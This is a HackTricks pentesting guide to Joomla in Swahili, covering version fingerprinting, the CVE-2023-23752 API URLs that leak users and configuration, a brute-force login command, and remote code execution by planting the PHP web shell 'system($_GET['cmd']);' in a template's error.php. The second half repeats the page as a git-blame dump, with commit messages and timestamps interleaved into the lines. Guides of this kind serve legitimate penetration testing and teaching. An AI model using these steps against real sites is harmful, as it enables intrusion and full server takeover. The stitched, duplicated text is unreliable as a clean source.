hacktricks/network-services-pentesting/pentesting-web/joomla.md

# Joomla

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

### Takwimu za Joomla

Joomla inakusanya baadhi ya [takwimu za matumizi](https://developer.joomla.org/about/stats.html) kama vile uchambuzi wa toleo la Joomla, PHP na database na mifumo ya uendeshaji wa seva inayotumiwa kwenye ufungaji wa Joomla. Data hii inaweza kuulizwa kupitia [API yao ya umma](https://developer.joomla.org/about/stats/api.html).
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
```
## Uthibitisho

### Kugundua/Kuweka Alama za Miguu

* Angalia **meta**
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
```
* robots.txt
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```
* README.txt
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```
### Toleo

* Katika **/administrator/manifests/files/joomla.xml** unaweza kuona toleo.
* Katika **/language/en-GB/en-GB.xml** unaweza kupata toleo la Joomla.
* Katika **plugins/system/cache/cache.xml** unaweza kuona toleo la karibu.
```bash
droopescan scan joomla --url http://joomla-site.local/
```
### API Unauthenticated Information Disclosure:
Toleo kutoka 4.0.0 hadi 4.2.7 lina hatari ya kufichua habari bila kuthibitishwa (CVE-2023-23752) ambayo itadumpa creds na habari nyingine.

* Watumiaji: `http://<host>/api/v1/users?public=true`

* Faili ya Config: `http://<host>/api/index.php/v1/config/application?public=true`

**Moduli wa MSF**: `scanner/http/joomla_api_improper_access_checks` au skripti ya ruby: [51334](https://www.exploit-db.com/exploits/51334)

### Brute-Force
Unaweza kutumia [skripti hii](https://github.com/ajnik/joomla-bruteforce) kujaribu kufanya nguvu ya kuingia.
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin
```
## RCE

Ikiwa umefanikiwa kupata **mameneja wa admin**, unaweza **RCE ndani yake** kwa kuongeza kipande cha **mimbo ya PHP** ili kupata **RCE**. Tunaweza kufanya hivi kwa **kubinafsisha** **template**.

1. **Bonyeza** kwenye **`Templates`** chini kushoto chini ya `Configuration` ili kupata menyu ya templates.
2. **Bonyeza** kwenye jina la **template**. Tuchague **`protostar`** chini ya kichwa cha safu ya `Template`. Hii itatupeleka kwenye ukurasa wa **`Templates: Customise`**.
3. Hatimaye, unaweza bonyeza kwenye ukurasa ili kupata **chanzo cha ukurasa**. Tuchague ukurasa wa **`error.php`**. Tutaweka **PHP one-liner ili kupata utekelezaji wa kodi** kama ifuatavyo:
1. **`system($_GET['cmd']);`**
4. **Hifadhi & Funga**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			`# Joomla`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`* Je, unafanya kazi katika kampuni ya usalama wa mtandao? Unataka kuona kampuni yako ikitangazwa kwenye HackTricks? au unataka kupata upatikanaji wa toleo jipya la PEASS au kupakua HackTricks kwa PDF? Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Jiunge na [💬](https://emojipedia.org/speech-balloon/) [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au fuata kwenye Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Takwimu za Joomla`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`Joomla inakusanya baadhi ya [takwimu za matumizi](https://developer.joomla.org/about/stats.html) kama vile uchambuzi wa toleo la Joomla, PHP na database na mifumo ya uendeshaji wa seva inayotumiwa kwenye ufungaji wa Joomla. Data hii inaweza kuulizwa kupitia [API yao ya umma](https://developer.joomla.org/about/stats/api.html).`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			```bash
			`curl -s https://developer.joomla.org/stats/cms_version \| python3 -m json.tool`

			`{`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`"data": {`
			`"cms_version": {`
			`"3.0": 0,`
			`"3.1": 0,`
			`"3.10": 6.33,`
			`"3.2": 0.01,`
			`"3.3": 0.02,`
			`"3.4": 0.05,`
			`"3.5": 12.24,`
			`"3.6": 22.85,`
			`"3.7": 7.99,`
			`"3.8": 17.72,`
			`"3.9": 27.24,`
			`"4.0": 3.21,`
			`"4.1": 1.53,`
			`"4.2": 0.82,`
			`"4.3": 0,`
			`"5.0": 0`
			`},`
			`"total": 2951032`
			`}`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			`}`
			```
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`## Uthibitisho`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`### Kugundua/Kuweka Alama za Miguu`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Angalia meta`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			```bash
			`curl https://www.joomla.org/ \| grep Joomla \| grep generator`

			`<meta name="generator" content="Joomla! - Open Source Content Management" />`
			```
			`* robots.txt`
			```
			`# If the Joomla site is installed within a folder`
			`# eg www.example.com/joomla/ then the robots.txt file`
			`# MUST be moved to the site root`
			`# eg www.example.com/robots.txt`
			`# AND the joomla folder name MUST be prefixed to all of the`
			`# paths.`
			`[...]`
			```
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`* README.txt`
Translated to Swahili 2024-02-11 02:13:58 +00:00			```
			`1- What is this?`
			`* This is a Joomla! installation/upgrade package to version 3.x`
			`* Joomla! Official site: https://www.joomla.org`
			`* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history`
			`* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging`
			```
			`### Toleo`

			`* Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.`
			`* Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.`
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`* Katika plugins/system/cache/cache.xml unaweza kuona toleo la karibu.`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			```bash
			`droopescan scan joomla --url http://joomla-site.local/`
			```
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`### API Unauthenticated Information Disclosure:`
			`Toleo kutoka 4.0.0 hadi 4.2.7 lina hatari ya kufichua habari bila kuthibitishwa (CVE-2023-23752) ambayo itadumpa creds na habari nyingine.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			* Watumiaji: `http://<host>/api/v1/users?public=true`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			* Faili ya Config: `http://<host>/api/index.php/v1/config/application?public=true`

			Moduli wa MSF: `scanner/http/joomla_api_improper_access_checks` au skripti ya ruby: [51334](https://www.exploit-db.com/exploits/51334)

			`### Brute-Force`
			`Unaweza kutumia [skripti hii](https://github.com/ajnik/joomla-bruteforce) kujaribu kufanya nguvu ya kuingia.`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			```shell-session
			`sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin`
Translated to Swahili 2024-02-11 02:13:58 +00:00
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			`admin:admin`
			```
			`## RCE`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			`Ikiwa umefanikiwa kupata mameneja wa admin, unaweza RCE ndani yake kwa kuongeza kipande cha mimbo ya PHP ili kupata RCE. Tunaweza kufanya hivi kwa kubinafsisha template.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to s 2024-04-10 11:57:17 +00:00			1. Bonyeza kwenye `Templates` chini kushoto chini ya `Configuration` ili kupata menyu ya templates.
			2. Bonyeza kwenye jina la template. Tuchague `protostar` chini ya kichwa cha safu ya `Template`. Hii itatupeleka kwenye ukurasa wa `Templates: Customise`.
			3. Hatimaye, unaweza bonyeza kwenye ukurasa ili kupata chanzo cha ukurasa. Tuchague ukurasa wa `error.php`. Tutaweka PHP one-liner ili kupata utekelezaji wa kodi kama ifuatavyo:
Translated to Swahili 2024-02-11 02:13:58 +00:00			1. `system($_GET['cmd']);`
			`4. Hifadhi & Funga`
fix URL error I think once the code is injected, the correct URL is: "/templates/protostar/error.php" and not: "/templates/protostar/error.php/error.php" 2023-12-22 13:19:47 +00:00			5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`